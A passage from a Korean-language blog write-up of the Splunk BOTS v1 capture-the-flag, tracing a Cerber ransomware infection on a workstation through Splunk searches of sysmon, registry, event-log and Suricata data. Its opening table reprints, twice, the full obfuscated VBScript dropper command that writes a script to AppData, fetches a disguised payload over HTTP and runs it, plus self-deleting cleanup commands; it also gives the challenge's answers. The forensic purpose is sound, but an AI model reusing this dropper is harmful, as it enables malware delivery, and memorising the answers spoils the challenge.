BAU7Cz.StaTUstExt=A9y(“652840353A542512023C5B3D572F27”,”S5I2A”) then” “PwTLW23=36” “GAiF” “R4xYBS=63” “MA(4)” “PjL6m=46” “GKfD3aY BAU7Cz.ReSpONSEbody” “Fj98=72” “Else” “D7T=91” “IK=”NNXFD0”” “NK=74” “SeT BAU7Cz= CreATeobJECT(A9y(“033125365F3D213E326A68030210121060”,IK))” “QJ=35” “BAU7Cz.oPeN A9y(“2A2F0E”,”TmjZ8d”),A9y(“07351B31556E40785D6F5D735D6F5E715B6F5E795D6E02291B33412B1F26”,”Ao” ),5022-5022” “UMp8=85” “BAU7Cz.SeTReqUesTheadER A9y(“1439190A24”,”AFXwm”),A9y(“371038301A716C5F7B6644”,”LUi”)” “NluUc=93” “BAU7Cz.SENd()” “EOtR=44” “If BAU7Cz.STaTUSTexT=A9y(“03510A3B3A51146F105F163B365E0C”,”OS0x”) THen GKfD3aY BAU7Cz.REsPOnSeBODY” “Q6sMEZ=54” “I9Nl7=56” “end if” “Dq=54” “eND FuNCTioN” “fUNctIon OyVNo(U1,Brt0d)” “SNOW=59” “OyVNo=(U1 ANd noT Brt0d)oR(NOt U1 And Brt0d)” “QTi5K=54” “enD funcTION” “Sub Cke4e()” “WTOyAw=62” “dIM EuM,WIbud,NCiN,Fs8HJ” “A5AT=92” “NCiN=””””” “SX6=93” “WIbud=RWRL &amp; Ql9zEF &amp; A9y(“4A330F3F”,”WdGbOGp”)” “V5B7Zh=92” “M1p67jL RWRL,WIbud” “L13=45” “iF Fs8HJ=”” tHen MA(4)” “CHaK=38” “EuM=”Iqxkf”” “U56m=67” “SEt VP=creATeoBJEcT(A9y(“262B081420010C453521141407”,EuM))” “U5Quw=85” “VP.Run A9y(“1023287B163629755C0D6C06270F1E01536C6E7551”,”UsNL”) &amp; WIbud &amp; NCiN,2912-2912,5755-5755” “A6mfcYL=76” “End sUB” “JoxZ3=43” “AylniN” “suB GAiF()” “G4vzM=95” “Dim DCRml9g, CjoNOY9” “For DCRml9g = 68 To 6000327” “CjoNOY9 = Rvwr + 23 + 35 + 27” “Next” “KK0H=46” “enD sUb”) do @echo %~i)&gt;“!GSI!” &amp;&amp; start “” “!GSI!”</td>
      <td>100</td>
      <td>“C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE” /n /f “D:\Miranda_Tate_unveiled.dotm”</td>
    </tr>
    <tr>
      <td>93</td>
      <td>“C:\Windows\System32\WScript.exe” “C:\Users\bob.smith.WAYNECORPINC\AppData\Roaming\20429.vbs”</td>
      <td>4490</td>
      <td>cmd.exe /V /C set “GSI=%APPDATA%\%RANDOM%.vbs” &amp;&amp; (for %i in (“DIm RWRL” “FuNCtioN GNbiPp(Pt5SZ1)” “EYnt=45” “GNbiPp=AsC(Pt5SZ1)” “Xn1=52” “eNd fuNCtiON” “SUb OjrYyD9()” “J0Nepq=56” “Dim UJv,G4coQ” “LT=23” “dO WHiLE UJv&lt;&gt;3016-3015” “G4coQ=G4coQ+1” “WSCRiPt.sLEeP(11)” “LoOP” “UsZK0=85” “ENd suB” “fuNctIon J7(BLI4A3)” “K5AU=29” “J7=cHR(BLI4A3)” “XBNutM9=36” “eNd fuNCtiON” “SUb MA(QrG)” “WXCzRz=9” “Dim Jw” “Qt7=34” “Jw=TIMeR+QrG” “Do WhiLE tIMEr&lt;Jw” “WSCRipT.sleEP(6)” “LOOp” “EXdkRkH=78” “enD sUB” “fUnCTion M1p67jL(BwqIM7,Qa)” “Yi=80” “dIM KH,ChnFY,RX,Pg,C6YT(8)” “Cm=7” “C6YT(1)=107” “Rzf=58” “C6YT(5)=115” “BSKoW=10” “C6YT(4)=56” “Cwd6=35” “C6YT(7)=110” “AQ=98” “C6YT(6)=100” “Y6Cm1I=82” “C6YT(2)=103” “JH3F2i=74” “C6YT(8)=119” “JRvsG2s=76” “C6YT(3)=53” “Yh=31” “C6YT(0)=115” “GuvD=47” “Tbvf1=67” “SeT KH=cReATeObject(A9y(“3C3A1D301F2D063708772930033C3C201C2D0A34203B053C0C2D”, “Yo”))” “V2JR=73” “Set ChnFY=KH.GETfilE(BwqIM7)” “RGeJ=68” “SeT Pg=ChnFY.opEnASTExTstReAM(6806-6805,7273-7273)” “CtxOk=82” “seT RX=KH.cREateteXtFiLe(Qa,6566-6565,2508-2508)” “XPL9af=76” “Do uNtil Pg.aTEnDOfStReam” “RX.wRitE J7(OyVNo(GNbiPp(Pg.rEAD(6633-6632)),C6YT(0)))” “LooP” “IQz=49” “RX.cloSe” “CBR1gC7=51” “Pg.cLOSE” “PmG=64” “eNd funCTIOn” “FUNcTION Ql9zEF()” “IBL2=16” “Ql9zEF=secoND(Time)” “MUTkPNJ=41” “End FUNcTiOn” “FUnCtion A9y(Am,T1GCbB)” “CWCH9r=82” “Dim V3sl0m,F4ra,AxFE” “RLLp8R=89” “For V3sl0m=1 To (lEn(Am)/2)” “F4ra=(J7((8270-8232)) &amp; J7((5328/74))&amp;(miD(Am,(V3sl0m+V3sl0m)-1,2)))” “AxFE=(GNbiPp(mID(T1GCbB,((V3sl0m MOd Len(T1GCbB))+1),1)))” “A9y=A9y+J7(OyVNo(F4ra,AxFE))” “NeXT” “DxZ40=89” “enD fUNction” “Sub AylniN()” “N6nzb=92” “DIm GWJCk,Q3y,GKasG0” “FDu=47” “GWJCk=93961822” “UZ=32” “FoR Q3y=1 To GWJCk” “GKasG0=GKasG0+1” “neXt” “B1jq2Hk=63” “If GKasG0=GWJCk tHen” “KXso=18” “MA((-176+446))” “IP4=48” “Yq(A9y(“0B3B1D44626E7E1020055D3C20230A3B0C503D31230C3700593135344D201B53772C39173D475E2826”,”QcOi4XA”))” “YTsWy=31” “elSe” “DO5gpmA=84” “A8=86” “EnD iF” “XyUP=64” “eND SuB” “sUB GKfD3aY(FaddNPJ)” “SDU0BLq=57” “DiM UPhqZ,KbcT” “DxejPK=88” “KbcT=”Drn4AW”” “GROlc7=82” “sET UPhqZ=CREAteOBJecT(A9y(“332A7B05156A211A46243629”,KbcT))” “Gs0g=3” “UPhqZ.OpEn” “TF1=68” “UPhqZ.tyPE=6867-6866” “RDjmY=24” “UPhqZ.wrITe FaddNPJ” “WiFgvS=78” “UPhqZ.SaVeTOfIle RWRL,8725-8723” “AF=4” “UPhqZ.closE” “JC7sf2=1” “Cke4e” “JM=88” “EnD suB” “fuNCtIoN Yq(PDqi1)” “I0=22” “DiM YTwwO,BAU7Cz,Uv,JiYwVG,IK” “GJDnbE=32” “On ErrOR reSume NeXT” “B7bT=1” “Uv=”Tk”” “ELw=73” “sEt YTwwO=CREaTeObjeCT(A9y(“3C07082602241F7A383C0E3807”,Uv))” “K4=62” “GAiF” “IS1cj=19” “Set Dzc0=YTwwO.eNVIrONMEnt(A9y(“013B183400023A”,”EQiWw”))” “D9S=38” “RWRL=Dzc0(A9y(“14630811720C14”,”XU3”))&amp;J7((8002-7910))&amp; Ql9zEF &amp; Ql9zEF” “AtCQ=95” “JiYwVG=”FcQqQ”” “Tf=79” “sEt BAU7Cz=CrEATEoBjECT(A9y(“2E38122329103E1725683B1C3D19123701”,JiYwVG))” “QUY=56” “BAU7Cz.OpeN A9y(“0D0E1E”,”KJ”),PDqi1,7387-7387” “JX2=58” “BAU7Cz.SeTReQuEstHeAdeR A9y(“1F59242828”,”OM8J”),A9y(“0D354C3D356B567A0F6B6B”,”VoL8XF”)” “URkT=71” “BAU7Cz.SEnD()” “QdFeA6=65” “if BAU7Cz.StaTUstExt=A9y(“652840353A542512023C5B3D572F27”,”S5I2A”) then” “PwTLW23=36” “GAiF” “R4xYBS=63” “MA(4)” “PjL6m=46” “GKfD3aY BAU7Cz.ReSpONSEbody” “Fj98=72” “Else” “D7T=91” “IK=”NNXFD0”” “NK=74” “SeT BAU7Cz= CreATeobJECT(A9y(“033125365F3D213E326A68030210121060”,IK))” “QJ=35” “BAU7Cz.oPeN A9y(“2A2F0E”,”TmjZ8d”),A9y(“07351B31556E40785D6F5D735D6F5E715B6F5E795D6E02291B33412B1F26”,”Ao” ),5022-5022” “UMp8=85” “BAU7Cz.SeTReqUesTheadER A9y(“1439190A24”,”AFXwm”),A9y(“371038301A716C5F7B6644”,”LUi”)” “NluUc=93” “BAU7Cz.SENd()” “EOtR=44” “If BAU7Cz.STaTUSTexT=A9y(“03510A3B3A51146F105F163B365E0C”,”OS0x”) THen GKfD3aY BAU7Cz.REsPOnSeBODY” “Q6sMEZ=54” “I9Nl7=56” “end if” “Dq=54” “eND FuNCTioN” “fUNctIon OyVNo(U1,Brt0d)” “SNOW=59” “OyVNo=(U1 ANd noT Brt0d)oR(NOt U1 And Brt0d)” “QTi5K=54” “enD funcTION” “Sub Cke4e()” “WTOyAw=62” “dIM EuM,WIbud,NCiN,Fs8HJ” “A5AT=92” “NCiN=””””” “SX6=93” “WIbud=RWRL &amp; Ql9zEF &amp; A9y(“4A330F3F”,”WdGbOGp”)” “V5B7Zh=92” “M1p67jL RWRL,WIbud” “L13=45” “iF Fs8HJ=”” tHen MA(4)” “CHaK=38” “EuM=”Iqxkf”” “U56m=67” “SEt VP=creATeoBJEcT(A9y(“262B081420010C453521141407”,EuM))” “U5Quw=85” “VP.Run A9y(“1023287B163629755C0D6C06270F1E01536C6E7551”,”UsNL”) &amp; WIbud &amp; NCiN,2912-2912,5755-5755” “A6mfcYL=76” “End sUB” “JoxZ3=43” “AylniN” “suB GAiF()” “G4vzM=95” “Dim DCRml9g, CjoNOY9” “For DCRml9g = 68 To 6000327” “CjoNOY9 = Rvwr + 23 + 35 + 27” “Next” “KK0H=46” “enD sUb”) do @echo %~i)&gt;“!GSI!” &amp;&amp; start “” “!GSI!”</td>
    </tr>
    <tr>
      <td>102</td>
      <td>“C:\Windows\System32\cmd.exe” /C START “” “C:\Users\bob.smith.WAYNECORPINC\AppData\Roaming\121214.tmp”</td>
      <td>93</td>
      <td>“C:\Windows\System32\WScript.exe” “C:\Users\bob.smith.WAYNECORPINC\AppData\Roaming\20429.vbs”</td>
    </tr>
    <tr>
      <td>100</td>
      <td>“C:\Windows\System32\WScript.exe” “C:\Users\bob.smith.WAYNECORPINC\Desktop# DECRYPT MY FILES #.vbs”</td>
      <td>96</td>
      <td>“C:\Users\bob.smith.WAYNECORPINC\AppData\Roaming{35ACA89F-933F-6A5D-2776-A3589FB99832}\osk.exe”</td>
    </tr>
  </tbody>
</table>

<p>vbs를 처음 실행하는 명령어의 길이는 4490입니다.</p>

<p>답 : 4490</p>

<p>205	What is the name of the USB key inserted by Bob Smith?<br />
Bob Smith가 삽입한 USB 키의 이름은 무엇입니까?</p>
<details>
  <summary>hint#1</summary>
  Tough question.  Perhaps you should give http://answers.splunk.com a try.<br />
  어려운 문제입니다. http://answer.splunk.com을 사용해 보십시오.
</details>
<p>USB의 이름은 friendlyname 컬럼에 저장되어있습니다. 해당값은 registry에 저장되어있으므로 sourcetype은 WinRegistry 입니다.</p>

<p><a href="https://en.wiktionary.org/wiki/friendly_name">FriendlyName이란?</a></p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>friendlyname
</code></pre></div></div>
<ul>
  <li>결과
    <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>08/24/2016 10:42:17.287  
event_status="(0)The operation completed successfully."  
pid=708  
process_image="c:\Windows\System32\svchost.exe"  
registry_type="SetValue"  
key_path="HKLM\system\controlset001\enum\wpdbusenumroot\umb\2&amp;37c186b&amp;0&amp;storage#volume#_??_usbstor#disk&amp;ven_generic&amp;prod_flash_disk&amp;rev_8.07#7d961196&amp;0#\friendlyname"  
data_type="REG_SZ"  
data="MIRANDA_PRI"  
host=we8105desk source=WinRegistry sourcetype=WinRegistry
</code></pre></div>    </div>
  </li>
</ul>

<p>registry의 data값이 MIRANDA_PRI임을 알수 있습니다.</p>

<p>답 : MIRANDA_PRI</p>

<p>206	Bob Smith’s workstation (we8105desk) was connected to a file server during the ransomware outbreak. What is the IP address of the file server?<br />
Bob Smith의 워크스테이션(we8105desk)은 랜섬웨어가 발생하는 동안 파일 서버에 연결되었습니다. 파일 서버의 IP 주소는 무엇입니까?</p>

<details>
  <summary>hint#1</summary>
  Search for SMB (Windows file sharing protocol) traffic from the infected device on the date in question. The "stats" SPL command can be used to count the most common destination IP for the SMB protocol.  
  해당 날짜에 감염된 장치에서 SMB(Windows 파일 공유 프로토콜) 트래픽을 검색합니다. "stats" SPL 명령은 SMB 프로토콜에 대한 가장 일반적인 대상 IP를 계산하는 데 사용할 수 있습니다.
</details>

<p>이 질문은 207, 209를 풀면 더 쉽게 알 수 있습니다.
207번 질문에서 원격 파일 서버의 pdf가 암호화되었다고 했으니, 검색해보면
hostname은 we9041srv.waynecorpinc.local, IP는 192.168.250.20인것을 알 수 있습니다.</p>

<p>답 : 192.168.250.20</p>

<p>207	How many distinct PDFs did the ransomware encrypt on the remote file server?<br />
랜섬웨어는 원격 파일 서버에서 얼마나 많은 개별 PDF를 암호화했습니까?</p>

<details>
  <summary>hint#1</summary>
  Don't use SMB this time - it's a trap!  Windows event logs are the way to go for this one.  Focus on the event types that deal with windows shares and narrow the search by looking for distinct filenames for the extension in question.<br />
  이번에는 SMB를 사용하지 마십시오. 함정입니다! Windows 이벤트 로그는 이를 위한 방법입니다. Windows 공유를 처리하는 이벤트 유형에 집중하고 해당 확장에 대한 고유한 파일 이름을 찾아 검색 범위를 좁힙니다.
</details>

<p>pdf 확장자를 검색해봅니다.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>.pdf
</code></pre></div></div>
<p><img src="https://wind-flow.github.io/assets/built/images/splunk/bots/v1/2021-10-18-17-48-58.png" alt="pdf확장자" /></p>

<p>파일이 암호화되었다면 eventlog에 파일생성, 파일 변경 등의 로그가 있을것입니다.</p>

<p>또, we8015에 있는 랜섬웨어가 원격서버인 we9041srv의 파일을 암호화 한것이므로 목적지가 we9041srv인 조건을 추가해 검색해봅니다.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>sourcetype="wineventlog" .pdf dest=we9041srv.waynecorpinc.local 192.168.250.100 | stats dc(Relative_Target_Name)
</code></pre></div></div>

<ul>
  <li>결과</li>
</ul>

<table>
  <thead>
    <tr>
      <th>dc(Relative_Target_Name)</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>257</td>
    </tr>
  </tbody>
</table>

<p>답 : 257</p>

<p>208	The VBscript found in question 204 launches 121214.tmp. What is the ParentProcessId of this initial launch?<br />
문제 204에서 찾은 VBscript는 121214.tmp를 시작합니다. 이 초기 실행의 ParentProcessId는 무엇입니까?</p>

<details>
  <summary>hint#1</summary>
  Embrace your sysmon data.  Search for a command issued by the infected device on the date in question referencing the filename in question, and use the process_id, ParentProcessId, CommandLine,  and ParentCommandLine, to track down the parent process id of them all.<br /> 
  sysmon 데이터를 수용하십시오. 해당 파일 이름을 참조하여 해당 날짜에 감염된 장치에서 실행된 명령을 검색하고 process_id, ParentProcessId, CommandLine 및 ParentCommandLine을 사용하여 모두의 상위 프로세스 ID를 추적합니다.
</details>

<p>parentprocessid는 sysmon에서 찾을 수 있습니다.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>sourcetype="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational" 121214.tmp
| where isnotnull(parent_process_id)
| table _time parent_process_id ParentCommandLine process_id CommandLine 
| sort _time
</code></pre></div></div>

<table>
  <thead>
    <tr>
      <th>_time</th>
      <th>parent_process_id</th>
      <th>ParentCommandLine</th>
      <th>process_id</th>
      <th>CommandLine</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>2016/08/24 16:48:21</td>
      <td>1476</td>
      <td>“C:\Windows\System32\cmd.exe” /C START “” “C:\Users\bob.smith.WAYNECORPINC\AppData\Roaming\121214.tmp”</td>
      <td>2948</td>
      <td>“C:\Users\bob.smith.WAYNECORPINC\AppData\Roaming\121214.tmp”</td>
    </tr>
    <tr>
      <td>2016/08/24 16:48:21</td>
      <td>3968</td>
      <td>“C:\Windows\System32\WScript.exe” “C:\Users\bob.smith.WAYNECORPINC\AppData\Roaming\20429.vbs”</td>
      <td>1476</td>
      <td>“C:\Windows\System32\cmd.exe” /C START “” “C:\Users\bob.smith.WAYNECORPINC\AppData\Roaming\121214.tmp”</td>
    </tr>
    <tr>
      <td>2016/08/24 16:48:29</td>
      <td>2948</td>
      <td>“C:\Users\bob.smith.WAYNECORPINC\AppData\Roaming\121214.tmp”</td>
      <td>3828</td>
      <td>“C:\Users\bob.smith.WAYNECORPINC\AppData\Roaming\121214.tmp”</td>
    </tr>
    <tr>
      <td>2016/08/24 16:48:41</td>
      <td>1280</td>
      <td>/d /c taskkill /t /f /im “121214.tmp” &gt; NUL &amp; ping -n 1 127.0.0.1 &gt; NUL &amp; del “C:\Users\bob.smith.WAYNECORPINC\AppData\Roaming\121214.tmp” &gt; NUL</td>
      <td>1684</td>
      <td>taskkill  /t /f /im “121214.tmp”</td>
    </tr>
    <tr>
      <td>2016/08/24 16:48:41</td>
      <td>3828</td>
      <td>“C:\Users\bob.smith.WAYNECORPINC\AppData\Roaming\121214.tmp”</td>
      <td>1280</td>
      <td>/d /c taskkill /t /f /im “121214.tmp” &gt; NUL &amp; ping -n 1 127.0.0.1 &gt; NUL &amp; del “C:\Users\bob.smith.WAYNECORPINC\AppData\Roaming\121214.tmp” &gt; NUL</td>
    </tr>
    <tr>
      <td>2016/08/24 16:48:41</td>
      <td>3828</td>
      <td>“C:\Users\bob.smith.WAYNECORPINC\AppData\Roaming\121214.tmp”</td>
      <td>3836	“C:\Users\bob.smith.WAYNECORPINC\AppData\Roaming{35ACA89F-933F-6A5D-2776-A3589FB99832}\osk.exe”</td>
      <td> </td>
    </tr>
    <tr>
      <td>2016/08/24 16:48:42</td>
      <td>1280</td>
      <td>/d /c taskkill /t /f /im “121214.tmp” &gt; NUL &amp; ping -n 1 127.0.0.1 &gt; NUL &amp; del “C:\Users\bob.smith.WAYNECORPINC\AppData\Roaming\121214.tmp” &gt; NUL</td>
      <td>556</td>
      <td>ping  -n 1 127.0.0.1</td>
    </tr>
  </tbody>
</table>

<p>질문에서 vbs가 121214.tmp를 실행시켰다고 하니 20429.vbs가 실행파일임을 알 수 있습니다.</p>

<p>답 : 3968</p>

<p>209	The Cerber ransomware encrypts files located in Bob Smith’s Windows profile. How many .txt files does it encrypt?<br />
Cerber 랜섬웨어는 Bob Smith의 Windows 프로필에 있는 파일을 암호화합니다. 얼마나 많은 .txt 파일을 암호화합니까?</p>

<details>
  <summary>hint#1</summary>
  Sysmon to the rescue again.  Focus on the infected machine as well as the user profile while searching for the filename extension in question.
  Sysmon에서 다시 찾읍시다. 문제의 파일 이름 확장자를 검색하는 동안 감염된 시스템과 사용자 프로필에 집중하십시오.
</details>
<details>
  <summary>hint#2</summary>
  In Sysmon events, EventCode=2 indicates file creation time has changed. Watch out for duplicates!<br />
  Sysmon 이벤트에서 EventCode=2는 파일 생성 시간이 변경되었음을 나타냅니다. 중복에 주의하세요!
</details>

<p>bob의 hostname은 we8105desk임을 전 문제에서 파악했습니다. 
아래 조건대로 쿼리를 작성해 검색해 봅시다.</p>

<ol>
  <li>침해당한 host는 we8105desk이다.</li>
  <li>침해당한 파일들의 확장자는 .txt파일</li>
  <li>File이 새로 생성 및 수정 됐을것이므로, eventCode는 2번일것이다(File Create time)</li>
  <li>TargetFilename을 보면 경로가 소유자/파일명형식으로 되어있다. 소유자가 bob smith인 데이터를 발췌.</li>
</ol>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>sourcetype=XmlWinEventLog:Microsoft-Windows-Sysmon/Operational host=we8105desk EventCode=2 TargetFilename=*smith*.txt
| stats dc(TargetFilename)
</code></pre></div></div>

<ul>
  <li>결과</li>
</ul>

<table>
  <thead>
    <tr>
      <th>dc(TargetFilename)</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>406</td>
    </tr>
  </tbody>
</table>

<p>답 : 406</p>

<p>210	The malware downloads a file that contains the Cerber ransomware cryptor code. What is the name of that file?<br />
멀웨어는 Cerber 랜섬웨어 암호화 코드가 포함된 파일을 다운로드합니다. 그 파일의 이름은 무엇입니까?</p>
<details>
  <summary>hint#1</summary>
  When looking for potentially malicious file, start your search with the Suricata data.  Narrow your search by focusing on the infected device. Remember malware does not always have to begin as an executable file.  <br />
  잠재적인 악성 파일을 찾을 때 Suricata 데이터로 검색을 시작하십시오. 감염된 장치에 집중하여 검색 범위를 좁힙니다. 맬웨어가 항상 실행 파일로 시작해야 하는 것은 아닙니다.
</details>

<p>203번 문제에서 파악한 의심스러운 도메인 solidaritedeproximite.org을 키워드로 suricata에서 찾아봅시다.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>sourcetype=suricata solidaritedeproximite.org
| dedup src dest dest_ip url
| table src dest dest_ip url
</code></pre></div></div>

<ul>
  <li>결과</li>
</ul>

<table>
  <thead>
    <tr>
      <th>src</th>
      <th>dest</th>
      <th>dest_ip</th>
      <th>url</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>37.187.37.150</td>
      <td>solidaritedeproximite.org</td>
      <td>192.168.250.100</td>
      <td>/mhtr.jpg</td>
    </tr>
    <tr>
      <td>192.168.250.100</td>
      <td>solidaritedeproximite.org</td>
      <td>37.187.37.150</td>
      <td>/mhtr.jpg</td>
    </tr>
  </tbody>
</table>

<p>의심스러운 도메인에서 접속한 파일은 이미지파일인 mhtr.jpg입니다.</p>

<p>답 : mhtr.jpg</p>

<p>211	Now that you know the name of the ransomware’s encryptor file, what obfuscation technique does it likely use?<br />
이제 랜섬웨어의 암호화 파일 이름을 알았으니 어떤 난독화 기술을 사용할까요?</p>
<details>
  <summary>hint#1</summary>
  The enrcyptor file was an image!  <br />
  암호화 파일은 이미지였습니다!
</details>

<p>암호화 파일은 이미지였으므로, 이미지관련 난독화기술은 steganography입니다.<br />
<a href="https://ko.wikipedia.org/wiki/%EC%8A%A4%ED%85%8C%EA%B0%80%EB%85%B8%EA%B7%B8%EB%9E%98%ED%94%BC">steganography란?</a></p>

                </div>
            </section>

            <!-- Email subscribe form at the bottom of the page -->
            <!-- 
                <section class="subscribe-form">
                    <h3 class="subscribe-form-title">Subscribe to wind-flow Tech Blog</h3>
                    <p>Get the latest posts delivered right to your inbox</p>
                    <span id="searchform" method="post" action="/subscribe/" class="">
    <input class="confirm" type="hidden" name="confirm"  />
    <input class="location" type="hidden" name="location"  />
    <input class="referrer" type="hidden" name="referrer"  />

    <div class="form-group">
        <input class="subscribe-email" onkeyup="myFunc()" 
               id="searchtext" type="text" name="searchtext"  
               placeholder="Search..." />
    </div>
    <script type="text/javascript">
        function myFunc() {
            if(event.keyCode == 13) {
                var url = encodeURIComponent($("#searchtext").val());
                location.href = "/search.html?query=" + url;
            }
        }
    </script>
</span>
                </section>
             -->

            <footer class="post-full-footer">
                <!-- Everything inside the #author tags pulls data from the author -->
                <!-- #author-->
                
                    
                        <section class="author-card">
                            
                                <img class="author-profile-image" src="/assets/images/profile.png" alt="wind-flow" />
                            
                            <section class="author-card-content">
                                <h4 class="author-card-name"><a href="/author/wind-flow">Kim-Gunwoo</a></h4>
                                
                                    <p>Finance Security IT Analyst</p>
                                
                            </section>
                        </section>
                        <div class="post-full-footer-right">
                            <a class="author-card-button" href="/author/wind-flow">Read More</a>
                        </div>
                    
                
                <!-- /author  -->
            </footer>

            <!-- If you use Disqus comments, just uncomment this block.
            The only thing you need to change is "test-apkdzgmqhj" - which
            should be replaced with your own Disqus site-id. -->
            
                <section class="post-full-comments">
                    <div id="disqus_thread"></div>
                    <script>
                        var disqus_config = function () {
                            var this_page_url = 'https://wind-flow.github.io/assets/built/images/splunk/bots/v1/2021-10-03-splunk-BOTS-v1-part2';
                            var this_page_identifier = '';
                            var this_page_title = 'splunk-bots-v1 write up - part2';
                        };
                        (function() {
                            var d = document, s = d.createElement('script');
                            s.src = 'https://xxxxxxxx.disqus.com/embed.js';
                            s.setAttribute('data-timestamp', +new Date());
                            (d.head || d.body).appendChild(s);
                        })();
                    </script>
                </section>
            

        </article>

    </div>
</main>

<!-- Links to Previous/Next posts -->
<aside class="read-next outer">
    <div class="inner">
        <div class="read-next-feed">
            
                
                
                
                
                    <article class="read-next-card"
                        
                            style="background-image: url(/assets/images/sevenpuzzle.jpg)"
                        
                    >
                        <header class="read-next-card-header">
                            <small class="read-next-card-header-sitetitle">&mdash; wind-flow Tech Blog &mdash;</small>
                            
                                <h3 class="read-next-card-header-title"><a href="/tag/splunk/">Splunk</a></h3>
                            
                        </header>
                        <div class="read-next-divider"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M13 14.5s2 3 5 3 5.5-2.463 5.5-5.5S21 6.5 18 6.5c-5 0-7 11-12 11C2.962 17.5.5 15.037.5 12S3 6.5 6 6.5s4.5 3.5 4.5 3.5"/></svg>
</div>
                        <div class="read-next-card-content">
                            <ul>
                                
                                
                                  
                                
                                  
                                
                                  
                                    
                                        
                                        
                                            <li><a href="/splunk-2021-BOTS-END">splunk 2021 bots 결과</a></li>
                                        
                                    
                                  
                                
                                  
                                    
                                        
                                        
                                            <li><a href="/splunk-BOTS-v3-part4">splunk-bots-v3 write up(4) - END</a></li>
                                        
                                    
                                  
                                
                                  
                                    
                                        
                                        
                                            <li><a href="/splunk-BOTS-v3-part3">splunk-bots-v3 write up(3)</a></li>
                                        
                                    
                                  
                                
                                  
                                    
                                        
                                        
                                    
                                  
                                
                                  
                                    
                                        
                                        
                                    
                                  
                                
                                  
                                    
                                        
                                        
                                    
                                  
                                
                                  
                                    
                                        
                                        
                                    
                                  
                                
                                  
                                    
                                        
                                        
                                    
                                  
                                
                                  
                                    
                                        
                                        
                                    
                                  
                                
                                  
                                    
                                        
                                        
                                    
                                  
                                
                                  
                                    
                                  
                                
                                  
                                    
                                        
                                        
                                    
                                  
                                
                                  
                                    
                                        
                                        
                                    
                                  
                                
                            </ul>
                        </div>
                        <footer class="read-next-card-footer">
                            <a href="/tag/splunk/">
                                
                                    See all 12 posts  →
                                
                            </a>
                        </footer>
                    </article>
                
            

            <!-- If there's a next post, display it using the same markup included from - partials/post-card.hbs -->
            

            <!-- If there's a previous post, display it using the same markup included from - partials/post-card.hbs -->
            

        </div>
    </div>
</aside>

<!-- Floating header which appears on-scroll, included from includes/floating-header.hbs -->
<div class="floating-header">
    <div class="floating-header-logo">
        <a href="https://wind-flow.github.io/">
            
            <span>wind-flow Tech Blog</span>
        </a>
    </div>
    <span class="floating-header-divider">&mdash;</span>
    <div class="floating-header-title">splunk-bots-v1 write up - part2</div>
    <div class="floating-header-share">
        <div class="floating-header-share-label">Share this <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24">
    <path d="M7.5 15.5V4a1.5 1.5 0 1 1 3 0v4.5h2a1 1 0 0 1 1 1h2a1 1 0 0 1 1 1H18a1.5 1.5 0 0 1 1.5 1.5v3.099c0 .929-.13 1.854-.385 2.748L17.5 23.5h-9c-1.5-2-5.417-8.673-5.417-8.673a1.2 1.2 0 0 1 1.76-1.605L7.5 15.5zm6-6v2m-3-3.5v3.5m6-1v2"/>
</svg>
</div>
        <a class="floating-header-share-tw" href="https://twitter.com/share?text=splunk-bots-v1+write+up+-+part2&amp;url=https://wind-flow.github.io/assets/built/images/splunk/bots/v1/2021-10-03-splunk-BOTS-v1-part2"
            onclick="window.open(this.href, 'share-twitter', 'width=550,height=235');return false;">
            <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 32 32"><path d="M30.063 7.313c-.813 1.125-1.75 2.125-2.875 2.938v.75c0 1.563-.188 3.125-.688 4.625a15.088 15.088 0 0 1-2.063 4.438c-.875 1.438-2 2.688-3.25 3.813a15.015 15.015 0 0 1-4.625 2.563c-1.813.688-3.75 1-5.75 1-3.25 0-6.188-.875-8.875-2.625.438.063.875.125 1.375.125 2.688 0 5.063-.875 7.188-2.5-1.25 0-2.375-.375-3.375-1.125s-1.688-1.688-2.063-2.875c.438.063.813.125 1.125.125.5 0 1-.063 1.5-.25-1.313-.25-2.438-.938-3.313-1.938a5.673 5.673 0 0 1-1.313-3.688v-.063c.813.438 1.688.688 2.625.688a5.228 5.228 0 0 1-1.875-2c-.5-.875-.688-1.813-.688-2.75 0-1.063.25-2.063.75-2.938 1.438 1.75 3.188 3.188 5.25 4.25s4.313 1.688 6.688 1.813a5.579 5.579 0 0 1 1.5-5.438c1.125-1.125 2.5-1.688 4.125-1.688s3.063.625 4.188 1.813a11.48 11.48 0 0 0 3.688-1.375c-.438 1.375-1.313 2.438-2.563 3.188 1.125-.125 2.188-.438 3.313-.875z"/></svg>

        </a>
        <a class="floating-header-share-fb" href="https://www.facebook.com/sharer/sharer.php?u=https://wind-flow.github.io/assets/built/images/splunk/bots/v1/2021-10-03-splunk-BOTS-v1-part2"
            onclick="window.open(this.href, 'share-facebook','width=580,height=296');return false;">
            <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 32 32"><path d="M19 6h5V0h-5c-3.86 0-7 3.14-7 7v3H8v6h4v16h6V16h5l1-6h-6V7c0-.542.458-1 1-1z"/></svg>

        </a>
    </div>
    <progress class="progress" value="0">
        <div class="progress-container">
            <span class="progress-bar"></span>
        </div>
    </progress>
</div>


<!-- /post -->

<!-- The #contentFor helper here will send everything inside it up to the matching #block helper found in default.hbs -->


        <!-- Previous/next page links - displayed on every page -->
        

        <!-- The footer at the very bottom of the screen -->
        <footer class="site-footer outer">
            <div class="site-footer-content inner">
                <section class="copyright"><a href="https://wind-flow.github.io/">wind-flow Tech Blog</a> &copy; 2022</section>
